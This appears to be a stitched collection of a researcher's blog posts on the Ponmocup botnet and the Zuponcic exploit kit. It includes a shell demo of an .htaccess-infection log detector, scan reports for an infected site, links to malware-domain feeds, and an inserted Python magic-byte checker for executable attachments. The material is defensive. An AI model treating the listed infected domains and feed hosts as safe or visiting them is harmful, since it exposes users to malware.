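cat > "$tmpdir/benign.log" <<'EOF'
--12:07:10-- http://www.example.com/
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: Apache
Set-Cookie: session=abc; path=/
Content-Type: text/html
EOF

# Demo run: the infected log is flagged, the benign one is not
zuponcic_chain_check "$tmpdir/infected.log"
zuponcic_chain_check "$tmpdir/benign.log" || true
```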
<br />
So now the question is: Is anyone else detecting these .htaccess infected sites?<br />
<br />
I haven't found any other detections. If you know of one, please let me know.<br />
<br />
<a href="http://www.urlvoid.com/scan/bad-saulgau.de/">http://www.urlvoid.com/scan/bad-saulgau.de/</a><br />
<br />
<h3>
Website Information</h3>
<table class="table table-bordered"><tbody>
<tr><td width="220">Analysis Date</td><td>8 seconds ago</td></tr>
<tr><td><span style="background-color: yellow;">Safety Reputation</span></td><td><span style="background-color: yellow;"><span class="label label-success">0/28</span></span></td></tr>
<tr><td>Domain 1st Registered</td><td>Unknown</td></tr>
<tr><td>Server Location</td><td><img alt="Flag" src="http://www.urlvoid.com/images/flags/de.gif" /> (DE) Germany</td></tr>
<tr><td>Google Page Rank</td><td><img alt="Google Page Rank" src="http://www.urlvoid.com/images/primages/pr4.gif" /></td></tr>
<tr><td>Alexa Traffic Rank</td><td>1,751,096</td></tr>
</tbody></table>
<br />
URLQuery can <a href="http://urlquery.net/domain_graph.php?id=1401817329491" target="_blank">detect the redirection</a> to Zuponcic Kit (assuming the user sets a required referrer URL), but there are no indications in the report that there is anything malicious.<br />
<br />
<a href="http://urlquery.net/report.php?id=1401817329491">http://urlquery.net/report.php?id=1401817329491</a><br />
<br />
<h2>
Overview</h2>
<table>
<tbody>
<tr class="odd">
<td class="odd_heading" style="vertical-align: top;">URL</td><td style="color: black; vertical-align: top;">www.bad-saulgau.de/</td>
<td rowspan="7" width="226px">
<br /> </td>
</tr>
<tr class="even">
<td class="even_heading">IP</td><td>82.165.95.226</td>
</tr>
<tr class="odd">
<td class="odd_heading">ASN</td><td>AS8560 1&amp;1 Internet AG</td>
</tr>
<tr class="even">
<td class="even_heading">Location</td><td><img height="11" src="http://urlquery.net/images/flags/de.png" title="Germany" width="16" /> Germany</td>
</tr>
<tr class="odd">
<td class="odd_heading">Report completed</td><td>2014-06-03 19:42:06 CET</td>
</tr>
<tr class="even">
<td class="even_heading">Status</td><td id="status"><b style="color: darkgreen;">Report complete.</b></td>
</tr>
<tr class="odd">
<td class="odd_heading"><span style="background-color: yellow;">urlQuery Alerts</span></td><td><span style="background-color: yellow;">
No alerts detected</span> </td></tr>
</tbody></table>
<h2>
Settings</h2>
<table>
<tbody>
<tr class="odd">
<td class="odd_heading">UserAgent</td><td>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0</td>
</tr>
<tr class="even">
<td class="even_heading">Referer</td><td>http://www.google.com/url?q=ponmocup+finder</td>
</tr>
<tr class="odd">
<td class="odd_heading">Pool</td><td><br /></td>
</tr>
<tr class="even">
<td class="even_heading">Access Level</td><td>public</td>
</tr>
</tbody>
</table>
<br /><h2>
Intrusion Detection Systems</h2>
<table>
<tbody>
<tr class="odd"><td class="odd_heading"><span style="background-color: yellow;">Snort /w Sourcefire VRT</span></td><td style="padding: 0px;"><span style="background-color: yellow;"> No alerts detected</span></td></tr>
<tr class="even"><td class="even_heading"><span style="background-color: yellow;">Suricata /w Emerging Threats Pro</span></td><td style="padding: 0px;"><span style="background-color: yellow;"> No alerts detected</span></td></tr>
</tbody>
</table>
<h2>
Blacklists</h2>
<table>
<tbody>
<tr class="odd"><td class="odd_heading"><span style="background-color: yellow;">DNS-BH / malwaredomains.com</span></td><td style="padding: 0px;"><span style="background-color: yellow;"> No alerts detected</span></td></tr>
<tr class="even"><td class="even_heading"><span style="background-color: yellow;">PhishTank / phishtank.com</span></td><td style="padding: 0px;"><span style="background-color: yellow;"> No alerts detected</span></td></tr>
<tr class="odd"><td class="odd_heading"><span style="background-color: yellow;">Spamhaus DBL / spamhaus.org</span></td><td style="padding: 0px;"><span style="background-color: yellow;"> No alerts detected</span></td></tr>
</tbody>
</table>
<h2>
Files Captured</h2>
<table><tbody>
<tr class="odd"><td class="odd_heading">Suricata IDS</td><td style="padding: 0px;"> No files captured</td></tr>
</tbody></table>
<br />
VirusTotal also doesn't have any malware or malicious activity associated with this domain:<br />
<br />
<a href="https://www.virustotal.com/en/domain/www.bad-saulgau.de/information/">https://www.virustotal.com/en/domain/www.bad-saulgau.de/information/</a><br />
(none)<br />
<br />
<br />
<a href="https://www.virustotal.com/en/url/c6ef57b6a1eee4ec6dacb3cea61541137d6cd5da8daec570c8444db63fc08e1d/analysis/1401828323/">https://www.virustotal.com/en/url/c6ef57b6a1eee4ec6dacb3cea61541137d6cd5da8daec570c8444db63fc08e1d/analysis/1401828323/</a><br />
<br />
<table class="table table-plain"><tbody>
<tr><td>URL:</td><td style="max-width: 600px; word-wrap: break-word;">http://www.bad-saulgau.de/</td></tr>
<tr><td>Detection ratio:</td><td class="text-green"><span style="background-color: yellow;">0 / 52</span></td></tr>
<tr><td>Analysis date:</td><td class="ltr">2014-06-03 20:45:23 UTC ( 0 minutes ago )</td></tr>
</tbody></table>
<br />
<br />
I wonder who will be the "first" to detect these <a href="http://www.symantec.com/connect/blogs/trojanmilicenso-infection-through-htaccess-redirection" target="_blank">.htaccess infections</a>... anyone? No? OK then...<br />
<br />
If you're not familiar with the Ponmocup malware / botnet yet, my <a href="http://c-apt-ure.blogspot.com/2013/12/ponmocup-hunter-is-re-tired.html" target="_blank">previous post</a> may be a good starting point linking all together.<br />
<br />
Yours truly,<br />
<br />
Ponmocup Hunter :-)<br />
<br />
<h2>Ponmocup Hunter is (re-)tired (TomU, 2013-12-15)</h2>
<span style="color: red;"><b>Update: Video from BotConf talk available now :-)</b><i><span style="color: black;"> (see below)</span></i></span><br />
<br />
For over two and a half years now, since March 2011, I've been researching and analysing this Ponmocup malware, which has so many different names. During this time I've written several blog posts, malware analyses [<a href="http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-10-05/" target="_blank">1</a>, <a href="http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-11-10/" target="_blank">2</a>], a "<a href="http://c-apt-ure.blogspot.com/2012/06/introducing-ponmocup-finder.html" target="_blank">Ponmocup Finder</a>" tool and published (CIF) feeds of malware domains.<br />
<br />
<ul>
<li><a href="http://c-apt-ure.blogspot.com/2013/05/ponmocup-hunter-sans-dfir-summit-2013.html" target="_blank">"Ponmocup Hunter" SANS DFIR Summit 2013</a> </li>
<li><a href="http://c-apt-ure.blogspot.com/2012/06/history-of-ponmocup-malwarebotnet.html" target="_blank">History of Ponmocup Malware / Botnet</a></li>
<li><a href="http://c-apt-ure.blogspot.com/2012/06/introducing-ponmocup-finder.html" target="_blank">Introducing Ponmocup-Finder</a> </li>
<li><a href="http://c-apt-ure.blogspot.com/2012/04/hunting-ponmocup-botnet.html" target="_blank">Hunting Ponmocup Botnet</a></li>
<li><a href="http://c-apt-ure.blogspot.com/2012/03/ponmocup-lots-changed-but-not-all.html" target="_blank">Ponmocup, lots changed, but not all</a> </li>
<li><a href="http://c-apt-ure.blogspot.com/2012/02/not-apt-but-nasty-malware-ponmocup.html" target="_blank">Not APT, but nasty malware (Ponmocup botnet)</a> </li>
</ul>
<br />
This year I have given three presentations called "My name is Hunter, Ponmocup Hunter", and each talk was different in some ways. To get the most out of them, you may want to view the slides in chronological order, or you can just skip to the latest and most complete one from BotConf (although the previous ones had more details about certain things).<br />
<br />
<ul>
<li>SANS DFIR Summit, Austin Texas, July 2013 (<a href="https://docs.google.com/file/d/0B99Jdz9cDQMDTW9xLXZTeE5lNzg/edit?pli=1" target="_blank">PDF slides</a>, <a href="http://computer-forensics.sans.org/summit-archives/DFIR_Summit/My-Name-is-Hunter-Ponmocup-Hunter-Tom-Ueltschi.pdf" target="_blank">alt. link</a>)</li>
<li>DeepSec conference, Vienna Austria, November 2013 (<a href="https://docs.google.com/file/d/0B99Jdz9cDQMDREx3YTlBY2w2c1k/edit?pli=1" target="_blank">PDF slides</a>, <a href="https://deepsec.net/docs/Slides/2013/DeepSec_2013_Tom_Ueltschi_-_My_Name_Is_Hunter,_Ponmocup_Hunter.pdf" target="_blank">alt. link</a>)</li>
<li>BotConf conference, Nantes France, December 2013 (<a href="https://docs.google.com/file/d/0B99Jdz9cDQMDN3VzNlNlaDdDMlk/edit?pli=1" target="_blank">PDF slides</a>, video maybe soon)</li>
</ul>
<br />
The BotConf talk was video recorded and hopefully soon I will be able to review the video and decide if I want to release it or not. (<a href="https://twitter.com/c_APT_ure" target="_blank">Tweet me</a> if you would like to see it for sure)<br />
<br />
I received some very nice feedback after every presentation; here is one of my favorites:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-UN3pjCbeBDU/Uq4MJeBHcMI/AAAAAAAAAMk/al-rKlJyLu8/s1600/twitter-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-UN3pjCbeBDU/Uq4MJeBHcMI/AAAAAAAAAMk/al-rKlJyLu8/s400/twitter-1.png" height="217" width="400" /></a></div>
<div style="text-align: center;">
<i>(<a href="https://twitter.com/cedricpernet/status/408894733164244993" target="_blank">Twitter link</a>)</i></div>
<br />
<br />
My public work is done (at least for a while, who knows), but the fight against this botnet has just begun. If you have first hand knowledge about this malware (most commonly known probably as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Vundo#tab=2" target="_blank">Vundo</a>) please ask to join the <a href="https://groups.google.com/group/ponmocup-botnet-working-group" target="_blank">Ponmocup Botnet Working Group</a> which has been formed for this reason.<br />
<br />
<b>Update 2013-12-29:</b><br />
<br />
There have been some great blog posts about the delivery of Ponmocup called Zuponcic Kit:<br />
<br />
<ul>
<li><a href="http://malwageddon.blogspot.nl/2013/06/zuponcic-is-it-bird-is-it-plane-no-its.html" target="_blank">Zuponcic: "Is it a bird?... Is it a plane?... No, it's another Exploit Kit" (Part 1)</a></li>
<li><a href="http://malwageddon.blogspot.nl/2013/08/zuponcic-is-it-bird-is-it-plane-no-its.html" target="_blank">Zuponcic: "Is it a bird?... Is it a plane?... No, it's another... wait, what!?" (Part 2)</a></li>
</ul>
by <a href="https://twitter.com/malwageddon" target="_blank">Malwageddon</a><br />
<br />
<ul>
<li><a href="http://blog.fox-it.com/2013/12/19/not-quite-the-average-exploit-kit-zuponcic/" target="_blank">Not quite the average exploit kit: Zuponcic</a> <b>&lt; Must Read!</b></li>
</ul>
<br />
by <a href="https://twitter.com/maartenvdantzig" target="_blank">Maarten van Dantzig</a>, <a href="https://twitter.com/ydklijnsma" target="_blank">Yonathan Klijnsma</a> & Barry Weymes (Fox-IT)<br />
<br />
In February at <a href="http://www.kaspersky.com/about/events/industry/sas2013" target="_blank">SAS2013</a> Eugene Aseev from Kaspersky Labs presented "<a href="http://media.kaspersky.com/en/Events/Presentations/Evgeny%20Aseev_The%20Hidden%20bot.pdf" target="_blank">The Hidden Bot</a>", which also highlights the fact that this malware / botnet is not well known and researched (yet). Unfortunately, the PDF doesn't show all details from the presentation, so if you would like the full-featured PPT version, please contact Eugene or me.<br />
<br />
This post is a work in progress mostly just to link to my presentations and I will update it for a while, when new details become available.<br />
<br />
<b>Update 2014-01-30:</b><br />
<br />
The video recorded from my latest "Ponmocup Hunter" talk at BotConf has been made publicly available. Thanks to <a href="https://twitter.com/udgover" target="_blank">Frederic</a> (@udgover) for the hard work put into making the video.<br />
<br />
Just a couple warnings before linking to the video:<br />
<br />
1) I don't consider myself a great or experienced speaker. I was still very nervous before every talk, but during the talk it got better.<br />
<br />
2) I had a very hoarse voice during my BotConf presentation because I was talking too much and too loud the night before with many great speakers and attendees at the dinner event.<br />
<br />
So hopefully you keep this in mind when watching the video and can see past it. I was giving the talk because I wanted to make more people aware of this botnet, and looking at the activity in my working group I think I succeeded with that.<br />
<br />
So without further ado, I hope you like the <b><a href="http://www.dailymotion.com/video/x1acb8u_17-tom-ueltschi-my-name-is-hunter-ponmocup-hunter_tech" target="_blank">video</a></b> !<br />
<br />
Also check out the other <a href="https://www.botconf.eu/index.php/schedule/" target="_blank">BotConf videos</a> available.<br />
<br />
I also like <a href="http://www.flickr.com/photos/deepsec/11836716103/in/set-72157639552146293" target="_blank">this picture</a> from my talk at DeepSec :-)<br />
<br />
Cheers,<br />
@c_APT_ure<br />
<br />
<b>Free DFIR Summit ticket contest</b> (2013-06-25)<br />
<br />
<span style="color: red;"><b>Sorry guys and gals, the contest ended prematurely and a winner has been chosen and notified already. So no more submissions will be processed.</b></span><br />
<br />
<br />
This may end up being just a temporary blog post for this one reason...<br />
<br />
SANS generously offered me a complimentary <a href="http://www.sans.org/event/dfir-summit-2013/" target="_blank">DFIR Summit</a> ticket to invite someone ("my guest"). So I'd like to pass this on to someone who deserves it and otherwise couldn't attend the Summit.<br />
<br />
So if you would really like to attend the DFIR Summit (to see <a href="http://c-apt-ure.blogspot.com/2013/05/ponmocup-hunter-sans-dfir-summit-2013.html" target="_blank">my talk</a>), your employer is not paying for it and you can't afford the $1995, then you should enter the contest, or raffle, or whatever I should call it. Also, if you are going to the summit but a colleague can't go, you can refer them here as well.<br />
<br />
There are some requirements to qualify:<br />
<br />
You need to be able to attend the Summit on July 9 and 10 in Austin TX. You need to pay for travel and hotel room yourself.<br />
<br />
And this requirement from SANS directly:<br />
<br />
"The only requirements are that your guest be recommended by you personally, and your guest must <a href="http://www.omnihotels.com/FindAHotel/AustinDowntown/MeetingFacilities/SANSInstitute7.aspx" target="_blank">reserve his/her own room</a> at the event hotel. (Note: This special offer applies only to NEW hotel reservations, not existing ones.)"<br />
<br />
<b>An Omni hotel reservation must be made before July 1st !</b><br />
<br />
Additionally, use the comment form of this post to apply for the free ticket <b>before Saturday morning</b> and give me the best reason why you deserve it... (any or all of the following)<br />
<br />
<br />
<ul>
<li>give your full name, twitter handle, blog URL or whatever to show your identity </li>
<li>list contributions to or collaborations with the DFIR (or IT-sec in general) community with examples</li>
<li>list any other good reason you can think of</li>
<li>how many adult beverages you're gonna buy me at the summit ;-)</li>
</ul>
<br />
If you want to share some information only with me and not publicly, please clearly state (<private>which part</private>) in your comment, since comments are moderated.<br />
<br />
I will decide on Saturday evening (10 pm UTC+2) who will get the spot and notify them. Hotel booking would need to be done on Sunday.<br />
<br />
I just like to give someone a chance to attend the DFIR Summit who otherwise could not.<br />
<br />
So please spread the word and may the best (most deserving) person win the free ticket!<br />
<br />
Cheers!<br />
<br />
@c_APT_ure<br />
<br />
<b>"Ponmocup Hunter" SANS DFIR Summit 2013</b> (2013-05-30)<br />
<br />
<b>Update:</b> the presentation slides have been online for a while [<a href="http://computer-forensics.sans.org/summit-archives/DFIR_Summit/My-Name-is-Hunter-Ponmocup-Hunter-Tom-Ueltschi.pdf" target="_blank">PDF link</a>].<br />
I've given a newer version of this talk at <a href="http://blog.deepsec.net/?p=1695" target="_blank">DeepSec</a> and <a href="https://www.botconf.eu/index.php/programme-preliminary/my-name-is-hunter-ponmocup-hunter-tom-ueltschi/" target="_blank">BotConf</a>. Slides will be linked when made public. <br />
<br />
I'm thrilled to give a presentation "My name is Hunter, Ponmocup Hunter" in July at the SANS DFIR Summit 2013 in Austin, Texas. (<a href="http://www.sans.org/event/dfir-summit-2013" target="_blank">Summit</a> / <a href="https://www.sans.org/event-downloads/30107/agenda.pdf" target="_blank">Agenda</a>).<br />
<br />
<b>Abstract:</b><br />
<br />
In early 2011 we discovered some systems in our network infected with botnet malware. Starting from one A/V event we discovered several host- and network-based indicators to identify and confirm several infections. A brief high-level overview of the security architecture will help you understand how the indicators could be found and searched for. With a one-strike remediation all infected systems were quarantined and cleaned. A few weeks later the sinkholing of several known C&amp;C domains showed the botnet was very big (several million bots). Quickly I got obsessed with analyzing and hunting this malware, which could infect fully patched systems without using exploits (only social engineering), protected by firewalls, IPS and multi-layered A/V. The malware got some visibility and media attention in June 2012 with titles such as "printer virus", "printer bomb" or "Trojan.Milicenso: A Paper Salesman's Dream Come True". This was likely due to an unwanted side-effect or "mistake" by the bot-master and probably didn't happen to all infected hosts or networks.<br />
<br />
<b>You'll learn:</b><br />
<ul>
<li>how the malware was discovered, what indicators were derived</li>
<li>how all infected hosts were identified and how remediation was done</li>
<li>how this malware spreads and how to defend against it</li>
<li>how to detect infected systems (host &amp; network indicators)</li>
<li>how to find infected web servers used to spread it</li>
<li>what malware functionalities are known and which are currently still unknown</li>
</ul>
<br />
If you can attend the DFIR Summit and haven't registered yet, you can use the discount code "Swiss10" to get 10% off.<br />
<br />
In the meantime, if you're not familiar with the Ponmocup malware yet, you can read my previous posts:<br />
<br />
<ul>
<li><a href="http://c-apt-ure.blogspot.com/2012/06/history-of-ponmocup-malwarebotnet.html" target="_blank">History of Ponmocup Malware / Botnet</a></li>
<li><a href="http://c-apt-ure.blogspot.com/2012/06/introducing-ponmocup-finder.html" target="_blank">Introducing Ponmocup-Finder</a> </li>
<li><a href="http://c-apt-ure.blogspot.com/2012/04/hunting-ponmocup-botnet.html" target="_blank">Hunting Ponmocup Botnet</a></li>
<li><a href="http://c-apt-ure.blogspot.com/2012/03/ponmocup-lots-changed-but-not-all.html" target="_blank">Ponmocup, lots changed, but not all</a> </li>
<li><a href="http://c-apt-ure.blogspot.com/2012/02/not-apt-but-nasty-malware-ponmocup.html" target="_blank">Not APT, but nasty malware (Ponmocup botnet)</a> </li>
</ul>
There are some more "Threat Intelligence" feeds available, besides the ones that have previously been listed:<br />
<br />
Lists of Malware Domains and IPs (pre- and post-infection) [CIF usable]<br />
<span style="font-family: 'Courier New',Courier,monospace;"><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-domains.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-domains.txt</a><br /><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-ips.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-ips.txt</a><br /><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-domains.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-domains.txt</a><br /><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-ips.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-ips.txt</a></span><br />
<br />
Now there's also a list for:<br />
<a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-infected-domains-CIF-latest.txt" target="_blank">Malware redirection servers and .htaccess infected web servers</a> [CIF]<br />
<br />
Ponmocup-Finder output:<br />
<a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-infected-domains-latest.txt" target="_blank">Currently infected websites</a> (redirecting to Malware downloads)<br />
<a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-infected-domains-history-uniq-infected-days.txt" target="_blank">History of all infected websites</a> (first and last seen)<br />
<br />
For more details you can follow me on Twitter (<a href="https://twitter.com/c_APT_ure" target="_blank">@c_APT_ure</a>) or look for <a href="https://twitter.com/search?q=%23Ponmocup&src=hash" target="_blank">#Ponmocup</a> tweets.<br />
<br />
If you would like to get involved with analyzing or fighting this Malware / Botnet please get in touch with me.<br />
<br />
Cheers,<br />
@c_APT_ure<br />
<br />
<b>DeepINTEL 2012</b> (2012-09-10)<br />
<br />
The first DeepINTEL conference is over. It was great, with a fairly small crowd where you got to meet and talk to everyone.<br />
<br />
Andrew Barrat, who gave a talk about "<i>Better Breach Disclosure = Better Risk Management?</i>", wrote a couple of blog posts about the other talks (<a href="http://makeitcompliant.blogspot.co.uk/2012/09/deep-intel.html" target="_blank">day 1</a>, <a href="http://makeitcompliant.blogspot.co.uk/2012/09/deep-intel-day-two.html" target="_blank">day 2</a>).<br />
<br />
So for those who couldn't attend DeepINTEL, here's a high-level overview of the topics, concepts and resources I gave in my talk, which was titled "<i>Preventing and Detecting Mass-Malware and Advanced Threats</i>".<br />
<br />
Here's the abstract that was given for CFP:<br />
<br />
<blockquote class="tr_bq">
<i>Your organization has firewalls, network IDS/IPS, anti-virus on multiple layers, maybe even HIPS, hardening and patching done and feels pretty safe and secure. But lots of companies and organizations who got breached had all that too. So maybe that’s not enough for today’s threats any more? This speech should give you lots of new intelligence resources to know who are the different threat actors, what are their motivations and techniques, what vulnerabilities are exploited by what threat actors, and some (maybe more or less unconventional) methods for prevention or detection of these threats. Most resources used are freely available, some need free registration and some are from personal work experience.</i></blockquote>
<br />
As a brief introduction to what I think is missing, I introduced the <a href="http://www.ren-isac.net/ses/" target="_blank">Security Event System</a> (SES) and the <a href="http://code.google.com/p/collective-intelligence-framework/" target="_blank">Collective Intelligence Framework</a> (CIF) project from REN-ISAC.<br />
<br />
The introduction about me and why I like to share malware and threat intelligence contained references to SANS ISC blog diaries (<a href="http://isc.sans.edu/diary.html?storyid=6805" target="_blank">1</a>, <a href="http://isc.sans.edu/diary.html?storyid=7879" target="_blank">2</a>, <a href="http://isc.sans.edu/diary.html?storyid=10168" target="_blank">3</a>), Mila's contagio malware dump <a href="http://contagiodump.blogspot.com/2010/08/cve-2009-3867-cve-2008-5353-java-low.html" target="_blank">blog post</a> and a couple of posts on Kyle's threatthoughts blog about <a href="http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing/" target="_blank">sharing</a> <a href="http://www.digital4rensics.com/blog/2012/02/thanks-for-sharing-indicators/" target="_blank">indicators</a>, which were based on information I collected and provided to them. Another example is the discovery and analysis of the Ponmocup botnet on the <a href="http://www.abuse.ch/?p=3294" target="_blank">abuse.ch blog</a>, where I shared a list of C&amp;C domains for sinkholing.<br />
This first part of the talk was also meant to show the limitations of antivirus, because lots of malware samples I discovered had zero or very low (less than 10%) initial detection rates (out of 42 AV scanners on VirusTotal), which I consider pretty bad.<br />
<br />
Next I introduced some terms and concepts like "cyberrisk intelligence", "actionable intelligence" and "cyber-risk data" from the <a href="http://www.rsa.com/innovation/docs/CISO-RPT-0112.pdf" target="_blank">SBIC report Getting Ahead of Advanced Threats</a>.<br />
This report contains several "charts" (though I'd rather call them tables) of such cyber-risk data along with examples. The first table, about "<i>cyber attack indicators</i>", gives interesting examples like "<i>description of spear phishing mails</i>", "<i>lists of domains hosting malware</i>" and "<i>set of binaries used by attackers</i>" (which for example could be file hashes like MD5 etc.).<br />
<br />
Then I used two quotes from Richard Bejtlich's posts on Mandiant's M-unition blog, which I like.<br />
In a post about "<a href="https://blog.mandiant.com/archives/3055" target="_blank"><i>understanding each type of targeted attacker</i></a>" he says: <br />
"<i style="color: blue;">When trying to defend an organization, it’s imperative to understand the nature of the threats who seek to compromise the enterprise. This is not a common belief, unfortunately.</i>"<br />
In another post about "<a href="https://blog.mandiant.com/archives/3127" target="_blank"><i>understanding state-serving adversaries</i></a>" he wrote:<br />
"<i style="color: blue;">A hallmark of a disciplined adversary, however, is to only use the level of “force” required to accomplish the mission, only escalating when the minimum fails to get the desired result. This is the true definition of "advanced," because it means the adversary knows how to properly deploy resources against a target.</i>"<br />
<br />
Elaborating on the different types of threat actors I used resources from Mandiant's <a href="http://www.mandiant.com/resources/m-trends/" target="_blank">M-trends 2012 report</a>, SANS Cyber Attack Threat Map <i>(page 2 from 20 Critical Security Controls poster 2010 -- not found online anymore)</i>, and <a href="http://go.secureworks.com/advancedthreats" target="_blank">Dell SecureWorks Advanced Threat Resource Center</a>.<br />
The presentation "<a href="http://www.slideshare.net/brycegalbraith/why-are-our-defenses-failing-one-click-is-all-it-takes" target="_blank">Why Are Our Defenses Failing Us? One Click Is All It Takes</a>" from Bryce Galbraith gives a very detailed and technical analysis of how little it takes to get breached.<br />
<br />
To give some examples and history of APT attacks I used the paper "<a href="http://www.commandfive.com/papers/C5_APT_ADecadeInReview.pdf" target="_blank">Advanced Persistent Threats: A Decade in Review</a>" from <a href="http://www.commandfive.com/research.html" target="_blank">Command5</a> and the hackmageddon.com site about the "<a href="http://hackmageddon.com/2012-cyber-attacks-timeline-master-index/" target="_blank">Cyber Attacks Timeline</a>".<br />
The next point I was trying to make is the importance of knowing which exploits are being used by which threat actors. An <a href="http://contagiodump.blogspot.com/2010/06/overview-of-exploit-packs-update.html" target="_blank">overview of exploit kits</a> (also called browser exploit packs / BEP) has been updated frequently on Mila's <a href="http://contagiodump.blogspot.com/" target="_blank">contagio malware dump blog</a>. This blog is also great to find out what exploits are used (see categories / labels) and to find malicious document samples from targeted attacks.<br />
<br />
Another great resource giving details about what exploits are used for APT attacks is a <a href="http://blog.xecure-lab.com/2012/07/prepare-for-advanced-persistent-threat.html" target="_blank">blog post from Xecure Lab</a>. Also from this company is <a href="http://scan.xecure-lab.com/" target="_blank">XecScan</a>, an online scan service for spear phishing document analysis. It's also a great OSINT source for indicators (MD5 hashes, C&C domains / IPs etc.) of APT spear phishing documents.<br />
<br />
The next topic was "<a href="http://windowsir.blogspot.com/2012/03/need-for-analysis-in-intelligence.html" target="_blank">the need for analysis in Intelligence-Driven Defense</a>" from the Windows-IR blog, which gives a nice summary of Dan Guido's paper "A case study of intelligence driven defense" and the <a href="http://www.trailofbits.com/resources/exploit_intelligence_project_paper.pdf" target="_blank">Exploit Intelligence Project</a> (<a href="http://www.isecpartners.com/storage/docs/presentations/EIP-2.0.pdf" target="_blank">EIP</a>).<br />
<br />
The paper "<a href="http://papers.rohanamin.com/wp-content/uploads/papers.rohanamin.com/2011/08/iciw2011.pdf" target="_blank">Intelligence Driven CND Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains</a>" introduces the "<i>intrusion kill chain</i>" and "<i>kill chain phases</i>" along with the definition of "<i>late phase detection</i>" (C2) versus "<i>early phase detection</i>" (delivery).<br />
<br />
So what's the relevance of all this? What do I make of it?<br />
<br />
Well, patching and updating all software, especially the OS, browser and all browser plugins (Java, Flash, Adobe Reader etc.), should be a very high priority. But some software, like Java with all its dependencies, is hard(er) to patch in a timely manner in some enterprises.<br />
<br />
So here are some suggestions for additional mass-malware prevention on a web proxy:<br />
<ul>
<li>implement a Java whitelist, allowing Java from trusted domains only (user-agent based)</li>
<li>limit executable downloads (magic bytes) to trusted domains (or categories if available)</li>
<li>block as many malicious IPs, IP ranges and 1st-level domains (esp. dyndns) as possible and as the business allows (start using CIF with many feeds)</li>
</ul>
<br />
And additional protection for a mail gateway:<br />
<ul>
<li>block or strip all executable (magic bytes) attachments, also inside ZIP or RAR files</li>
<li>keep mail logs of A/V events (with context) for a long period</li>
</ul>
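The two magic-byte rules above (executable downloads only from trusted domains on the proxy; executable attachments stripped from mail even when packed inside an archive) as an added Python example, not code from the original post. It assumes the gateway can hand over the raw attachment or response bytes; the trusted-domain set, host names and samples are constructed, nested ZIPs are handled with the standard library, and RAR is left out because there is no stdlib reader for it.

```python
"""Magic-byte checks for a mail gateway or web proxy (added example)."""
import io
import struct
import zipfile

# Magic bytes of the executable formats a gateway should care about.
PE_MAGIC = b"MZ"                      # Windows EXE/DLL/SCR (DOS stub header)
ELF_MAGIC = b"\x7fELF"                # Linux/Unix executables
MACHO_MAGICS = (b"\xfe\xed\xfa\xce", b"\xfe\xed\xfa\xcf", b"\xce\xfa\xed\xfe", b"\xcf\xfa\xed\xfe")
ZIP_MAGIC = b"PK\x03\x04"
MAX_DEPTH = 3                         # do not recurse forever into nested zips


def is_pe(data: bytes) -> bool:
    """True if data looks like a PE file: 'MZ' header plus a 'PE\\0\\0'
    signature at the offset stored in e_lfanew (header offset 0x3c)."""
    if len(data) < 0x40 or data[:2] != PE_MAGIC:
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3c)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def executable_type(data: bytes):
    """Name of the executable format, or None if the content is not one.
    The file name is deliberately ignored: 'invoice.pdf' can still start with MZ."""
    if is_pe(data):
        return "PE"
    if data.startswith(ELF_MAGIC):
        return "ELF"
    if data[:4] in MACHO_MAGICS:
        return "Mach-O"
    return None


def find_executables(data: bytes, name: str = "attachment", depth: int = 0):
    """List of (path, format) for every executable in data, descending into
    ZIP archives up to MAX_DEPTH. Encrypted members cannot be inspected,
    so they are reported as findings as well."""
    found = []
    kind = executable_type(data)
    if kind:
        return [(name, kind)]
    if not data.startswith(ZIP_MAGIC) or depth >= MAX_DEPTH:
        return found
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                member = f"{name}/{info.filename}"
                if info.flag_bits & 0x1:          # password-protected member
                    found.append((member, "encrypted"))
                    continue
                found.extend(find_executables(zf.read(info), member, depth + 1))
    except zipfile.BadZipFile:
        pass                                      # corrupt archive: nothing to descend into
    return found


def proxy_decision(host: str, body: bytes, trusted_domains: set) -> str:
    """Web proxy rule: executable downloads only from trusted domains."""
    if executable_type(body) is None:
        return "allow"
    return "allow" if host in trusted_domains else "block"


def mail_decision(attachment: bytes) -> str:
    """Mail gateway rule: strip any attachment that contains an executable."""
    return "strip" if find_executables(attachment) else "deliver"


# ---- constructed samples (harmless stand-ins, not real malware) ----
def fake_pe() -> bytes:
    """Minimal byte string with a valid MZ/PE header layout and no code."""
    hdr = bytearray(0x80)
    hdr[:2] = PE_MAGIC
    struct.pack_into("<I", hdr, 0x3c, 0x40)       # e_lfanew -> offset 0x40
    hdr[0x40:0x44] = b"PE\x00\x00"
    return bytes(hdr)


def zip_with(members: dict) -> bytes:
    """Build an in-memory ZIP from {filename: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for fname, content in members.items():
            zf.writestr(fname, content)
    return buf.getvalue()


INVOICE_ZIP = zip_with({"invoice.pdf.exe": fake_pe(), "readme.txt": b"hi"})
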